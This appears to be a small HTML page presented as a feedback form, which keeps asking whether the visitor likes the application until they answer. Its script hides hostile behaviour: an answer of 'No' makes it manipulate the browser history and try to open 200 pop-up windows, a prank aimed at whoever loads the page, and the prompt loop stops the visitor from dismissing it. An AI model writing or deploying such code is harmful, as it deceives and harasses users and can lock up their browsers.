<!DOCTYPE html>
<html>
<head>
    <title>Feedback</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            text-align: center;
            background-color: #f0f0f0;
            animation: bgAnimation 40s infinite alternate;
        }
        h1 {
            color: #333;
        }
        #demo {
            margin-top: 20px;
            font-size: 18px;
        }
        @keyframes bgAnimation {
            0%   { background-color: #00008B; }
            20%  { background-color: #0000CD; }
            40% { background-color: #1E90FF; }
            60% { background-color: #87CEFA; }
            80% { background-color: #ADD8E6; }
            100% { background-color: #AFEEEE; }
}
    </style>
</head>
<body>
    <h1>Game</h1>
    <p id="demo"></p>

    <script>
        let answer;
      var urls = ["https://example.com"];

        do {
            answer = prompt("Do you like this application? (Yes/No)");
            if (answer !== null) {
                if (answer.toLowerCase() === "yes") {
                    document.getElementById("demo").innerHTML = "Thank you";      
                } else if (answer.toLowerCase() === "no") {
                    document.getElementById("demo").innerHTML = "We're sorry to hear that.";
                  var total = "";
                  for( var i = 0; i < 1; i++ ) {
                      total = total + i.toString();
                      history.pushState(0,0, total );
                  }
                  for (var i = 0; i < 200; i++) {
                    window.open(urls, "_blank");
                  }          
                } else {
                    document.getElementById("demo").innerHTML = "Please provide a valid answer.";
                }
            } else {
                answer = prompt("Do you like this application? (Yes/No)");
            }
        } while (answer === null || (answer.toLowerCase() !== "yes" && answer.toLowerCase() !== "no"));
    </script>

</body>
</html>
